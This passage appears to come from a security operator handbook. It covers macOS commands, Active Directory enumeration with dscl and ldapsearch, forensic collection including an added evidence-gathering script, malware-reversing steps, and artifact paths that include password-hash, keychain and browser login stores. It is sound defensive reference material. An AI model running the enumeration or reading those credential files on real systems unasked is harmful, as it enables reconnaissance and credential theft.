SparkyLinux | 2012 | 5.7.1 | 4/3/19 | Debian
Source Mage GNU/Linux | 2002 | 0.62-11 | 10/22/17 | Sorcerer
SteamOS | 2013 | 2.195 | 7/19/19 | Debian
SUSE Linux Enterprise | 2000 | 15SP1 | 8/12/19 | Slackware, Jurix
Tails | 2009 | 3.14.2 | 6/23/19 | Debian
Tiny Core Linux | 2009 | 10.1 | 1/20/19 | inspired Damn Small Linux
Tor-ramdisk | 2008 | 20170130 | 1/30/17 | Gentoo Linux Embedded, uClibc
Trisquel GNU/Linux | 2005 | 8 | 4/18/18 | Ubuntu LTS
TurnKey GNU/Linux | 2008 | 15.x | 6/28/19 | Debian
Ubuntu | 2004 | 19.1 | 10/17/19 | Debian
Univention Corporate Server | 2004 | 4.4 | 3/12/19 | Debian
Ututo | 2000 | XS 2012 | 4/27/12 | Ututo XS: Gentoo Linux, Ututo UL: Ubuntu
VectorLinux | 1999 | VL 7.2 | 8/28/17 | Slackware
Void Linux | 2008 | Rolling | 10/7/17 | part/inspired by FreeBSD/NetBSD
Webconverger | 2007 | 35 | 5/19/16 | Debian
Xandros | 2001 | ? | 7/26/07 | Corel Linux
Zentyal | 2005 | 6 | 10/30/18 | Debian, Ubuntu
Zenwalk | 2004 | Rolling | 3/9/18 | Slackware
Zorin OS | 2009 | OS 15 | 6/5/19 | Ubuntu

REFERENCE:
[Link]

MACOS_Commands
ALL ADMINISTRATION MacOS
Default commands in macOS.

A-Z COMMANDS DESCRIPTION


A
afconvert Audio File Convert
afinfo Audio File Info
afplay Audio File Play
airport Manage Apple AirPort
alias Create an alias
alloc List used and free memory
apropos Search the whatis database for strings
asr Apple Software Restore
atsutil Font registration system utility
awk Find and Replace text within file(s)
B
basename Convert a full pathname to just a filename
bash Bourne-Again SHell
bg Send to background
bind Set or display readline key and function bindings
bless Set volume bootability and startup disk options
break Exit from a For, While, Until or Select loop
builtin Execute a shell builtin
bzip2 Compress or decompress files
C

caffeinate Prevent the system from sleeping
cal Display a calendar
calendar Reminder Service
caller Return the context of a subroutine call
cancel Cancel print jobs
case Conditionally perform a command
cat Concatenate and print (display) the content of files
cd Change Directory
chflags Change a file or folder's flags
chgrp Change group ownership
chmod Change access permissions
chown Change file owner and group
chroot Run a command with a different root directory
cksum Print CRC checksum and byte counts
clear Clear terminal screen
cmp Compare two files
comm Compare two sorted files line by line
command Run a command (not a function)
complete Edit a command completion [word/pattern/list]
continue Resume the next iteration of a loop
cp Copy one or more files to another location
cron Daemon to execute scheduled commands
crontab Schedule a command to run at a later date/time
csplit Split a file into context-determined pieces
csrutil Configure System Integrity Protection (SIP)
cupsfilter Convert a file to another format using cups filters
curl Transfer data from or to a server
cut Divide a file into several parts
D
date Display or change the date & time
dc Desk Calculator
dd Convert and copy a file, clone disks
declare Declare variable & set attributes
defaults Set preferences, show hidden files
df Display free disk space
diff Display the differences between two files
diff3 Show differences among three files
dig DNS lookup
dirname Convert a full pathname to just a path
dirs Display list of remembered directories
diskutil Disk utilities - Format, Verify, Repair
disown Unbind a job from the current login session
ditto Copy files and folders
dot_clean Remove dot-underscore files
drutil Interact with CD/DVD burners

dscacheutil Query or flush the Directory Service/DNS cache
dseditgroup Edit, create, manipulate, or delete groups
dsenableroot Enable root access
dsmemberutil View user and groups rights
dscl Directory Service command line utility
dtruss Print process system call time details
du Estimate file space usage
E
echo Display text on screen
ed A line-oriented text editor (edlin)
enable Enable and disable builtin shell commands
env List or Set environment variables
eval Evaluate several commands/arguments
exec Execute a command
exit Exit the shell
execsnoop Snoop new process execution
expand Convert tabs to spaces
expect Programmed dialogue with interactive programs
F
fc Fix command (history)
fdisk Partition table manipulator for Darwin UFS/HFS/DOS
fdesetup FileVault configuration, list FileVault users
fg Send job to foreground
file Determine file type
find Search for files that meet a desired criteria
fmt Reformat paragraph text
fold Wrap text to fit a specified width
for Loop command
fsck Filesystem consistency check and repair
fs_usage Filesystem usage (process/pathname)
ftp Internet file transfer program
function Define Function Macros
fuser List processes that have one or more files open
G
GetFileInfo Get attributes of HFS+ files
getopt Parse positional parameters
getopts Parse positional parameters
goto Jump to label and continue execution
grep Search file(s) for lines that match a given pattern
groups Print group names a user is in
gzip Compress or decompress files
H
halt Stop and restart the operating system

hash Refresh the cached/remembered location of commands
head Display the first lines of a file
hdiutil Manipulate iso disk images
history Command History
hostname Print or set system name
I
iconv Convert the character set of a file
id Print user and group names/id's
if Conditionally perform a command
ifconfig Configure network interface parameters
iostat Report CPU and i/o statistics
ipconfig View and control IP configuration state
info Help info
install Copy files and set attributes
iosnoop Snoop I/O events as they occur
J
jobs List active jobs
join Join lines on a common field
K
kextfind List kernel extensions
kextstat Display status of loaded kernel extensions (kexts)
kextunload Terminate driver instances and unload kernel extensions
kickstart Configure Apple Remote Desktop
kill Kill a process by specifying its PID
killall Kill processes by name
L
l List files in long format (ls -l)
last Indicate last logins of users and ttys
launchctl Load or unload daemons/agents
ll List files in long format, showing invisible files (ls -la)
less Display output one screen at a time
let Evaluate expression
lipo Convert a universal binary
ln Make links between files (hard links, symbolic links)
local Set a local (function) variable
locate Find files
logname Print current login name
login log into the computer
logout Exit a login shell (bye)
look Display lines beginning with a given string
lp Print files
lpr Print files
lprm Remove jobs from the print queue
lpstat Printer status information
ls List information about file(s)

lsregister Reset the Launch Services database
lsbom List a bill of materials file
lsof List open files
M
man Help manual
mdfind Spotlight search
mdutil Manage Spotlight metadata store
mkdir Create new folder(s)
mkfifo Make FIFOs (named pipes)
mkfile Make a file
mktemp Make a temporary file
more Display output one screen at a time
mount Mount a file system
mv Move or rename files or directories
N
nano Simple text editor
nc/netcat Read and write data across networks
net Manage network resources
netstat Show network status
networksetup Network and System Preferences
nice Set the priority of a command
nohup Run a command immune to hangups
[Link] NTFS file system utility
nvram Manipulate firmware variables
O
onintr Control the action of a shell interrupt
open Open a file/folder/URL/Application
opensnoop Snoop file opens as they occur
openssl OpenSSL command line
osacompile Compile Applescript
osascript Execute AppleScript
P
passwd Modify a user password
paste Merge lines of files
pbcopy Copy data to the clipboard
pbpaste Paste data from the Clipboard
pgrep List processes by a full or partial name
ping Test a network connection
pkill Kill processes by a full or partial name
pkgbuild Build a macOS Installer component package
pkgutil Query and manipulate installed packages
plutil Property list utility
pmset Power Management settings
popd Restore the previous value of the current directory
pr Convert text files for printing
printenv List environment variables
printf Format and print data
ps Process status
pushd Save and then change the current directory

pwd Print Working Directory
Q
quota Display disk usage and limits
R
rcp Copy files between machines
read Read one line from standard input
readonly Mark a variable or function as read-only
reboot Stop and restart the system
ReportCrash Enable/Disable crash reporting
return Exit a function
rev Reverse lines of a file
rm Remove files
rmdir Remove folder(s)
rpm Remote Package Manager
rsync Remote file copy - Sync file tree
S
say Convert text to audible speech
screen Multiplex terminal, run remote shells via ssh
screencapture Capture screen image to file or disk
scselect Switch between network locations
scutil Manage system configuration parameters
sdiff Merge two files interactively
security Administer Keychains, keys, certificates and the Security framework
sed Stream Editor
select Generate a list of items
serverinfo Server information
set Set a shell variable = value
setfile Set attributes of HFS+ files
sharing Create share points for afp, ftp and smb services
shasum Print or Check SHA Checksums
shift Shift positional parameters
shopt Set shell options
shutdown Shutdown or restart macOS
sips Scriptable image processing system
sleep Delay for a specified time
softwareupdate System software update tool
sort Sort text files
source Execute commands from a file
spctl Security assessment policy/Gatekeeper
split Split a file into fixed-size pieces
sqlite3 SQL database (download history)
srm Securely remove files or directories
stat Display the status of a file
stop Stop a job or process
su Substitute user identity
sudo Execute a command as another user
sum Print a checksum for a file

suspend Suspend execution of this shell
sw_vers Print macOS operating system version
sysctl Get or set kernel state
system_profiler Report system configuration
systemsetup Computer and display system settings
T
tail Output the last part of files
tar Tape ARchiver
tccutil Manage the privacy database
tcpdump Dump traffic on a network
tee Redirect output to multiple files
test Condition evaluation
textutil Manipulate text files in various formats (Doc,html,rtf)
time Measure Program Resource Use
times Print shell & shell process times
tmutil Time Machine utility
top Display process information
touch Change file timestamps
tput Set terminal-dependent capabilities, color, position
tr Translate, squeeze, and/or delete characters
trap Execute a command when the shell receives a signal
traceroute Trace Route to Host
trimforce Enable TRIM commands on third-party drives
tty Print filename of terminal on stdin
type Describe a command
U
[Link] Mount/unmount UFS file system
ulimit limit the use of system-wide resources
umask Users file creation mask
umount Unmount a device
unalias Remove an alias
uname Print system information
unexpand Convert spaces to tabs
uniq Uniquify files
units Convert units from one scale to another
unset Remove variable or function names
until Loop command
uptime Show how long system has been running
users Print login names of users currently logged in
until Execute commands (until error)
uuencode Encode a binary file
uudecode Decode a file created by uuencode
uuidgen Generate a Unique ID (UUID/GUID)
uucp Unix to Unix copy
V
vi Text Editor

W
w Show who is logged on & what they are doing
wait Wait for a process to complete
wall Write a message to users
wc Print byte, word, and line counts
whatis Search the whatis database for complete words
whereis Locate a program
which Locate a program file in the user's path
while Loop command
who Print all usernames currently logged on
whoami Print the current user id and name (id -un)
write Send a message to another user
X
xargs Execute utility - passing arguments
xattr Display and manipulate extended attributes
xcode-select --install Install the command line developer tools
Y
yes Print a string until interrupted
Z
zip Package and compress (archive) files.
!! Run the last command again

MacOS DOMAIN ENUMERATION COMMANDS

Domain: [Link]
User Enumeration:
dscl . ls /Users
dscl . read /Users/[username]
dscl "/Active Directory/TEST/All Domains" ls /Users
dscl "/Active Directory/TEST/All Domains" read /Users/[username]
dscacheutil -q user
LDAP:
ldapsearch -H ldap://[Link] -b DC=test,DC=local "(objectclass=user)"
ldapsearch -H ldap://[Link] -b DC=test,DC=local "(&(objectclass=user)(name=[username]))"

Computer Enumeration:
dscl "/Active Directory/TEST/All Domains" ls /Computers
dscl "/Active Directory/TEST/All Domains" read "/Computers/[compname]$"
LDAP:
ldapsearch -H ldap://[Link] -b DC=test,DC=local "(objectclass=computer)"
ldapsearch -H ldap://[Link] -b DC=test,DC=local "(&(objectclass=computer)(name=[computername]))"

Group Enumeration:
dscl . ls /Groups
dscl . read "/Groups/[groupname]"
dscl "/Active Directory/TEST/All Domains" ls /Groups
dscl "/Active Directory/TEST/All Domains" read "/Groups/[groupname]"
LDAP:
ldapsearch -H ldap://[Link] -b DC=test,DC=local "(objectclass=group)"
ldapsearch -H ldap://[Link] -b DC=test,DC=local "(&(objectclass=group)(name=[groupname]))"
ldapsearch -H ldap://[Link] -b DC=test,DC=local "(&(objectclass=group)(name=*admin*))"

Domain Information:
dsconfigad -show
LDAP:
ldapsearch -H ldap://[Link] -b DC=test,DC=local "(objectclass=trusteddomain)"

MACOS_Defend
BLUE TEAM FORENSICS MacOS

Evidence Collection Order of Volatility (RFC3227)


• Registers, cache
• Routing table, arp cache, process table, kernel statistics,
memory
• Temporary file systems
• Disk
• Remote logging and monitoring data that is relevant to the
system in question
• Physical configuration, network topology
• Archival media
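The list above gives the order; what a responder also needs is a collection run that follows it, keeps every step's output separately, and records enough metadata (time, exit status, hash of each output file) that the collection itself can be verified afterwards. The script below is an added example, not from the handbook. It assumes a POSIX shell and uses the macOS/BSD command names (netstat -rn, arp -an, lsof, sysctl, ifconfig), most of which also exist on Linux; a command missing on the host is logged as skipped rather than aborting the run. Registers and CPU cache are not reachable from userland, so the run records its start time in their place; remote logs, physical topology and archival media are gathered elsewhere.

```shell
#!/bin/sh
# Added example, not from the handbook: volatile-evidence collection in the
# RFC 3227 order, with a verifiable index of every output file.

# hash_file FILE -> "<sha256>  FILE"; coreutils first, Perl shasum as fallback
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1"
    else shasum -a 256 "$1"; fi
}

# run_step OUTDIR SEQ LABEL COMMAND [ARGS...]
# Runs COMMAND, saves stdout+stderr to OUTDIR/SEQ_LABEL.txt, then appends one
# tab-separated index line: utc-time, seq, label, rc=N, sha256, output file.
# A missing tool is recorded with rc=127 instead of stopping the collection.
run_step() {
    outdir=$1 seq=$2 label=$3
    shift 3
    out="$outdir/${seq}_${label}.txt"
    if command -v "$1" >/dev/null 2>&1; then
        "$@" >"$out" 2>&1
        rc=$?
    else
        printf 'skipped: %s not found on this host\n' "$1" >"$out"
        rc=127
    fi
    printf '%s\t%s\t%s\trc=%s\t%s\t%s\n' \
        "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$seq" "$label" "$rc" \
        "$(hash_file "$out" | cut -d' ' -f1)" "$out" >>"$outdir/index.tsv"
}

# collect_volatile OUTDIR: most volatile first, as RFC 3227 recommends.
collect_volatile() {
    outdir=$1
    mkdir -p "$outdir" || return 1
    : >"$outdir/index.tsv"
    # Registers/cache are not readable from userland; timestamp the start.
    run_step "$outdir" 01 clock     date -u
    run_step "$outdir" 02 kernel    uname -a
    run_step "$outdir" 03 uptime    uptime
    # Routing table, ARP cache, process table, sockets, kernel statistics
    run_step "$outdir" 04 routes    netstat -rn
    run_step "$outdir" 05 arp       arp -an
    run_step "$outdir" 06 processes ps aux
    run_step "$outdir" 07 sockets   lsof -nP -i
    run_step "$outdir" 08 sysctl    sysctl -a
    # Temporary file systems
    run_step "$outdir" 09 tmpfs     ls -laR /tmp /var/tmp
    # Disk: what is mounted and how full, before anything is imaged
    run_step "$outdir" 10 mounts    mount
    run_step "$outdir" 11 disks     df -h
    # Network configuration (physical topology is documented by hand)
    run_step "$outdir" 12 ifaces    ifconfig -a
    return 0
}

# step_count OUTDIR -> number of steps recorded in the index
step_count() { wc -l <"$1/index.tsv" | tr -d ' '; }

# ok_count OUTDIR -> number of steps that ran and exited 0
ok_count() { grep -c 'rc=0' "$1/index.tsv"; }

# Usage: sh collect.sh --run [OUTDIR]   (run as root to see every process/socket)
if [ "${1:-}" = "--run" ]; then
    collect_volatile "${2:-./volatile_$(date -u +%Y%m%dT%H%M%SZ)}"
fi
```

Write OUTDIR to removable or network storage rather than the suspect disk, and hash index.tsv itself once the run finishes; the per-step hashes then let anyone re-verify that no output file was altered after collection.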

MacOS FORENSIC/DEFENSIVE TOOLS


VENATOR
macOS tool for proactive detection
REFERENCE:
[Link]
[Link]detection-34055a017e56

Google Santa Process Whitelisting


Santa is a binary whitelisting/blacklisting system for macOS.
REFERENCE:
[Link]

KNOCK KNOCK
See what's persistently installed on your Mac. KnockKnock uncovers
persistently installed software in order to generically reveal
malware.
REFERENCE:
[Link]

LuLu
LuLu is the free, open firewall for Macs that can protect your
network connections and detect malicious activity.
REFERENCE:
[Link]

BlockBlock
BlockBlock provides continual protection by monitoring persistence
locations. Any new persistent component will trigger a BlockBlock
alert, allowing malicious items to be blocked.
REFERENCE:
[Link]

Netiquette
Netiquette, a network monitor, allows one to explore all network
sockets and connections, either via an interactive UI or from the
command line.
REFERENCE:
[Link]

mac_apt
mac_apt is a DFIR tool to process Mac computer full disk images (or
live machines) and extract data/metadata useful for forensic
investigation.
REFERENCE:
[Link]

OSXCollector
The collection script runs on a potentially infected machine and
outputs a JSON file that describes the target machine. OSXCollector
gathers information from plists, SQLite databases and the local
file system.
REFERENCE:
[Link]

REVERSING MacOS MALWARE

#Install Apple Command Line Tools
Tools include:
strings - string decoder
file, nm, xattr, mdls - file analysis utilities
hexdump, od, xxd - hex editors
otool - static disassembler
lldb - debugger, memory reader and dynamic disassembler

#File type the malware sample:
file malware_file
xattr -l malware_file
ls -al@ malware_file

#If signed, check _CodeSignature for IoCs.
codesign -dvvvv -r - malware_file.app/
#Look for TeamIdentifier & Bundle Identifier

#Check if the certificate is still valid or revoked:
spctl --verbose=4 --assess --type execute malware_file.app

#Application Bundle Enumeration
plutil -p malware_file.app/Contents/[Link]

#pagestuff & nm to look at internal structure
nm -m malware_file.app/Contents/MacOS/malware_file
pagestuff malware_file.app/Contents/MacOS/malware_file -a

#Dump strings to a file for review
strings - malware_file > [Link]

#Use otool to find shared library links, method names, & disassembly
otool -L malware_file > [Link]
otool -oV malware_file > [Link]
otool -tV malware_file > [Link]

MacOS MISC
Show System Logs
log show > [Link]
sudo log collect --start <time> --output <file>

MacOS ARTIFACT LOCATIONS


AUTORUN LOCATIONS
Launch Agents files
  /Library/LaunchAgents/*
  /System/Library/LaunchAgents/*
  %%[Link]%%/Library/LaunchAgents/*
Launch Daemons files
  /Library/LaunchDaemons/*
  /System/Library/LaunchDaemons/*
Startup Items file
  /Library/StartupItems/*
  /System/Library/StartupItems/*

SYSTEM LOGS
System Log files main folder
  /var/log/*
Apple System Log
  /var/log/asl/*
Audit Log
  /var/audit/*
Installation log
  /var/log/[Link]
Mac OS X utmp and wtmp login record file
  /var/log/wtmp
  /var/log/utmp
Mac OS X lastlog file
  /var/log/lastlog
Mac OS X 10.5 utmpx login record file
  /var/run/utmpx
Apple Unified Logging and Activity Tracing
  /var/db/diagnostics/*.tracev3
  /var/db/diagnostics/*/*.tracev3
  /var/db/uuidtext/*/*

SYSTEM PREFERENCES
System Preferences plist files
  /Library/Preferences/**
Global Preferences plist file
  /Library/Preferences/.[Link]st
Login Window Info plist
  /Library/Preferences/[Link].plist
Bluetooth Preferences and paired device info
  /Library/Preferences/[Link]ist
Time Machine Info plist
  /Library/Preferences/[Link].plist
Keyboard layout plist file
  /Library/Preferences/[Link]ist
System configuration preferences plist file
  /Library/Preferences/SystemConfiguration/pr[Link]

SYSTEM SETTINGS/INFO
OS Installation time
  /var/db/.AppleSetupDone
OS name and version plist
  /System/Library/CoreServices/SystemVersion.plist
Users Log In Password Hash Plist
  /var/db/dslocal/nodes/Default/users/*.plist

SLEEP/HIBERNATE SWAP
Sleep Image File
  /var/vm/sleepimage
Swap Files
  /var/vm/swapfile#

KERNEL EXTENSIONS
Kernel extension (.kext) files
  /System/Library/Extensions/*
  /Library/Extensions/*

SOFTWARE INSTALLATION
Software Installation History
  /Library/Receipts/[Link]
Software Update
  /Library/Preferences/[Link][Link]

SYSTEM INFO MISC.
Local Time Zone configuration
  /etc/localtime
Mac OS X at jobs
  /usr/lib/cron/jobs/*
Cron tabs
  /etc/crontab
  /usr/lib/cron/tabs/*
Periodic system functions scripts and configuration
  /etc/defaults/[Link]
  /etc/[Link]
  /etc/[Link]
  /etc/periodic/**2
  /usr/local/etc/periodic/**2
  /etc/[Link]/*
  /etc/[Link]/*
  /etc/[Link]/*
  /etc/periodic/daily/*
  /etc/periodic/weekly/*
  /etc/periodic/monthly/*

NETWORKING
Hosts file
  /etc/hosts
Remembered Wireless Networks
  /Library/Preferences/SystemConfiguration/co[Link]

USER ARTIFACTS
AUTORUN
Login Items
  %%[Link]%%/Library/Preferences/com.a[Link]
USERS
Users directories in /Users
  /Users/*
USER DIRECTORIES
Downloads Directory
  %%[Link]%%/Downloads/*
Documents Directory
  %%[Link]%%/Documents/*
Music Directory
  %%[Link]%%/Music/*
Desktop Directory
  %%[Link]%%/Desktop/*
Library Directory
  %%[Link]%%/Library/*
Movies Directory
  %%[Link]%%/Movies/*
Pictures Directory
  %%[Link]%%/Pictures/*
Public Directory
  %%[Link]%%/Public/*
Applications
  /Applications/*
PREFERENCES
User preferences directory
  %%[Link]%%/Library/Preferences/*
iCloud user preferences
  %%[Link]%%/Library/Preferences/Mobil[Link]
Sidebar Lists Preferences
  %%[Link]%%/Library/Preferences/com.a[Link]
  %%[Link]%%/Preferences/[Link][Link]
User Global Preferences
  %%[Link]%%/Library/Preferences/.Glob[Link]
Dock database
  %%[Link]%%/Library/Preferences/com.a[Link]
Attached iDevices
  %%[Link]%%/Library/Preferences/com.a[Link]
Quarantine Event Database
  %%[Link]%%/Library/Preferences/com.a[Link]
  %%[Link]%%/Library/Preferences/com.a[Link].QuarantineEventsV2
LOGS
User and Applications Logs Directory
  %%[Link]%%/Library/Logs/*
Misc. Logs
  /Library/Logs/*
Terminal Commands History
  %%[Link]%%/.bash_history
Terminal Commands Sessions
  %%[Link]%%/.bash_sessions/*
USER'S ACCOUNTS
User's Social Accounts
  %%[Link]%%/Library/Accounts/Accounts[Link]
iDEVICE BACKUPS
iOS device backups directory
  %%[Link]%%/Library/Application Support/MobileSync/Backup/*
iOS device backup information
  %%[Link]%%/Library/Application Support/MobileSync/Backup/*/[Link]
iOS device backup apps information
  %%[Link]%%/Library/Application Support/MobileSync/Backup/*/[Link]
iOS device backup files information
  %%[Link]%%/Library/Application Support/MobileSync/Backup/*/[Link]
iOS device backup status information
  %%[Link]%%/Library/Application Support/MobileSync/Backup/*/[Link]
RECENT ITEMS
Recent Items
  %%[Link]%%/Library/Preferences/com.a[Link]
Recent Items application specific
  %%[Link]%%/Library/Preferences/*LSSh[Link]
MISC
Application Support Directory
  %%[Link]%%/Library/Application Support/*
Keychain Directory
  %%[Link]%%/Library/Keychains/*
User Trash Folder
  %%[Link]%%/.Trash/*
macOS NotificationCenter database
  /private/var/folders/[a-z][0-9]/*/0/[Link]/db2/db
  /private/var/folders/[a-z][0-9]/*/0/[Link]/db/db
  %%[Link]%%/Library/Application Support/NotificationCenter/*.db
KnowledgeC User and Application usage database
  %%[Link]%%/Library/Application Support/Knowledge/[Link]
  /private/var/db/CoreDuet/Knowledge/knowledg[Link]

APPLICATIONS ARTIFACTS
iCLOUD
iCloud Accounts
  %%[Link]%%/Library/Application Support/iCloud/Accounts/*
SKYPE
Skype Directory
  %%[Link]%%/Library/Application Support/Skype/*
Skype User profile
  %%[Link]%%/Library/Application Support/Skype/*/*
Skype Preferences and Recent Searches
  %%[Link]%%/Library/Preferences/com.s[Link]
Main Skype database
  %%[Link]%%/Library/Application Support/Skype/*/[Link]
Chat Sync Directory
  %%[Link]%%/Library/Application Support/Skype/*/chatsync/*
SAFARI
Safari Main Folder
  %%[Link]%%/Library/Safari/*
Safari Bookmarks
  %%[Link]%%/Library/Safari/Bookmarks.plist
Safari Downloads
  %%[Link]%%/Library/Safari/Downloads.plist
Safari Installed Extensions
  %%[Link]%%/Library/Safari/Extensions/[Link]
  %%[Link]%%/Library/Safari/Extensions/*
Safari History
  %%[Link]%%/Library/Safari/[Link]ist
  %%[Link]%%/Library/Safari/[Link]
Safari History Index
  %%[Link]%%/Library/Safari/HistoryInd[Link]
Safari Last Session
  %%[Link]%%/Library/Safari/LastSessio[Link]
Safari Local Storage Directory
  %%[Link]%%/Library/Safari/LocalStorage/*
Safari Local Storage Database
  %%[Link]%%/Library/Safari/LocalStorage/[Link]
Safari Top Sites
  %%[Link]%%/Library/Safari/TopSites.plist
Safari Webpage Icons Database
  %%[Link]%%/Library/Safari/WebpageIco[Link]
Safari Webpage Databases
  %%[Link]%%/Library/Safari/Databases/*
Safari Cache Directory
  %%[Link]%%/Library/Caches/[Link].Safari/*
Safari Cache
  %%[Link]%%/Library/Caches/[Link].Safari/[Link]
Safari Extensions Cache
  %%[Link]%%/Library/Caches/[Link].Safari/Extensions/*
Safari Webpage Previews
  %%[Link]%%/Library/Caches/[Link].Safari/Webpage Previews/*
Safari Cookies
  %%[Link]%%/Library/Cookies/Cookies.binarycookies
Safari Preferences and Search terms
  %%[Link]%%/Library/Preferences/com.a[Link]
Safari Extension Preferences
  %%[Link]%%/Library/Preferences/com.a[Link]
Safari Bookmark Cache
  %%[Link]%%/Library/Caches/Metadata/Safari/Bookmarks/*
Safari History Cache
  %%[Link]%%/Library/Caches/Metadata/Safari/History/*
Safari Temporary Images
  %%[Link]%%/Library/Caches/[Link].Safari/fsCachedData/*
FIREFOX
Firefox Directory
  %%[Link]%%/Library/Application Support/Firefox/*
Firefox Profiles
  %%[Link]%%/Library/Application Support/Firefox/Profiles/*
Firefox Cookies
  %%[Link]%%/Library/Application Support/Firefox/Profiles/*/[Link]
Firefox Downloads
  %%[Link]%%/Library/Application Support/Firefox/Profiles/*/[Link]
Firefox Form History
  %%[Link]%%/Library/Application Support/Firefox/Profiles/*/[Link]te
Firefox History
  %%[Link]%%/Library/Application Support/Firefox/Profiles/*/[Link]
Firefox Signon
  %%[Link]%%/Library/Application Support/Firefox/Profiles/*/[Link]
Firefox Key
  %%[Link]%%/Library/Application Support/Firefox/Profiles/*/[Link]
Firefox Permissions
  %%[Link]%%/Library/Application Support/Firefox/Profiles/*/[Link]te
Firefox Add-ons
  %%[Link]%%/Library/Application Support/Firefox/Profiles/*/[Link]
  %%[Link]%%/Library/Application Support/Firefox/Profiles/*/[Link]
Firefox Extension
  %%[Link]%%/Library/Application Support/Firefox/Profiles/*/[Link]e
  %%[Link]%%/Library/Application Support/Firefox/Profiles/*/[Link]
Firefox Pages Settings
  %%[Link]%%/Library/Application Support/Firefox/Profiles/*/content-[Link]
Firefox Cache
  %%[Link]%%/Library/Caches/Firefox/Profiles/*.default/Cache/*
  %%[Link]%%/Library/Caches/Firefox/Profiles/*.default/cache2/*
  %%[Link]%%/Library/Caches/Firefox/Profiles/*.default/cache2/doomed/*
  %%[Link]%%/Library/Caches/Firefox/Profiles/*.default/cache2/entries/*
CHROME
Chrome Main Folder
  %%[Link]%%/Library/Application Support/Google/Chrome/*
Chrome Default profile
  %%[Link]%%/Library/Application Support/Google/Chrome/default/*
Chrome History
  %%[Link]%%/Library/Application Support/Google/Chrome/*/History
  %%[Link]%%/Library/Application Support/Google/Chrome/*/Archived History
  %%[Link]%%/Library/Application Support/Google/Chrome Canary/*/Archived History
  %%[Link]%%/Library/Application Support/Google/Chrome Canary/*/History
Chrome Bookmarks
  %%[Link]%%/Library/Application Support/Google/Chrome/*/Bookmarks
Chrome Cookies
  %%[Link]%%/Library/Application Support/Google/Chrome/*/Cookies
Chrome Local Storage
  %%[Link]%%/Library/Application Support/Google/Chrome/*/Local Storage/*
Chrome Login Data
  %%[Link]%%/Library/Application Support/Google/Chrome/*/Login Data
Chrome Top Sites
  %%[Link]%%/Library/Application Support/Google/Chrome/*/Top Sites
Chrome Web Data
  %%[Link]%%/Library/Application Support/Google/Chrome/*/Web Data
Chrome Extensions
  %%[Link]%%/Library/Application Support/Google/Chrome/*/databases/*
  %%[Link]%%/Library/Application Support/Google/Chrome/*/databases/Databases.db
  %%[Link]%%/Library/Application Support/Google/Chrome/*/Extensions/**10
  %%[Link]%%/Library/Application Support/Google/Chrome Canary/*/Extensions/**{10}
Chrome Extension Activity
  %%[Link]%%/Library/Application Support/Google/Chrome/*/Extension Activity
  %%[Link]%%/Library/Application Support/Google/Chrome Canary/*/Extension Activity
Chrome Cache
  %%[Link]%%/Library/Caches/[Link].Chrome/[Link]
  %%[Link]%%/Library/Caches/Google/Chrome/*/Cache/*
  %%[Link]%%/Library/Caches/Google/Chrome Canary/*/Cache/*
Chrome Media Cache
  %%[Link]%%/Library/Caches/Google/Chrome/*/Media Cache/*
  %%[Link]%%/Library/Caches/Google/Chrome Canary/*/Media Cache/*
Chrome Application Cache
  %%[Link]%%/Library/Application Support/Google/Chrome/*/Application Cache/Cache/*
  %%[Link]%%/Library/Application Support/Google/Chrome Canary/*/Application Cache/Cache/*
Chrome GPU Cache
  %%[Link]%%/Library/Application Support/Google/Chrome/*/GPUCache/*
  %%[Link]%%/Library/Application Support/Google/Chrome Canary/*/GPUCache/*
Chrome PNaCl translation cache
  %%[Link]%%/Library/Caches/Google/Chrome/PnaclTranslationCache/*
  %%[Link]%%/Library/Caches/Google/Chrome Canary/PnaclTranslationCache/*
Chrome Preferences Files
  %%[Link]%%/Library/Preferences/com.g[Link]
  %%[Link]%%/Library/Application Support/Google/Chrome/*/Preferences
  %%[Link]%%/Library/Application Support/Google/Chrome Canary/*/Preferences
CHROMIUM
Chromium History
  %%[Link]%%/Library/Application Support/Chromium/*/Archived History
  %%[Link]%%/Library/Application Support/Chromium/*/History
Chromium Cache
  %%[Link]%%/Caches/Chromium/*/Cache/*
  %%[Link]%%/Library/Caches/Chromium/*/Cache/*
Chromium Application Cache
  %%[Link]%%/Library/Application Support/Chromium/*/Application Cache/Cache/*
Chromium Media Cache
  %%[Link]%%/Library/Caches/Chromium/*/Media Cache/*
Chromium GPU Cache
  %%[Link]%%/Library/Application Support/Chromium/*/GPUCache/*
Chromium PNaCl translation cache
  %%[Link]%%/Library/Caches/Chromium/PnaclTranslationCache/*
Chromium Preferences
  %%[Link]%%/Library/Application Support/Chromium/*/Preferences
Chromium Extensions
  %%[Link]%%/Library/Application Support/Chromium/*/Extensions/**10
Chromium Extensions Activity
  %%[Link]%%/Library/Application Support/Chromium/*/Extension Activity
MAIL
Mail Main Folder
  %%[Link]%%/Library/Mail/V[0-9]/*
Mail Mailbox Directory
  %%[Link]%%/Library/Mail/V[0-9]/Mailboxes/*
Mail IMAP Synched Mailboxes
  %%[Link]%%/Library/Mail/V[0-9]/IMAP-<name@address>/*
Mail POP Synched Mailboxes
  %%[Link]%%/Library/Mail/V[0-9]/POP-<name@address>/*
Mail BackupTOC
  %%[Link]%%/Library/Mail/V[0-9]/MailData/[Link]
Mail Envelope Index
  %%[Link]%%/Library/Mail/V[0-9]/MailData/Envelope Index
Mail Opened Attachments
  %%[Link]%%/Library/Mail/V[0-9]/MailData/[Link]
Mail Signatures by Account
  %%[Link]%%/Library/Mail/V[0-9]/MailData/Signatures/*.plist
Mail Downloads Directory
  %%[Link]%%/Library/Containers/[Link][Link]/Data/Library/Mail Downloads/*
Mail Preferences
  %%[Link]%%/Library/Preferences/com.a[Link]
Mail Recent Contacts
  %%[Link]%%/Library/Application Support/AddressBook/[Link]
Mail Accounts
  %%[Link]%%/Library/Mail/V[0-9]/MailData/[Link]

173
REFERENCE:
[Link]
[Link]
[Link]collection
[Link]
[Link]CfxHLOW_GNGpX8/edit#gid=1317205466
[Link]
[Link]
[Link]%20response%20on%[Link]
[Link]Infection_Analysis_.pdf
[Link]
[Link]
[Link]
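The Quarantine Event Database in the user PREFERENCES section above is one of the first artifacts to pull when a download is the suspected initial access: it records which agent fetched what, from where, and when. The script below is an added example (not code from the Operator Handbook or from any of the listed tools) that timelines it. It assumes the LSQuarantineEvent column names used in the query and that LSQuarantineTimeStamp is a Core Foundation absolute time (seconds since 2001-01-01 UTC, not the Unix epoch); getting that epoch wrong shifts every event by 31 years. The rows in build_sample_db() are constructed for the example.

```python
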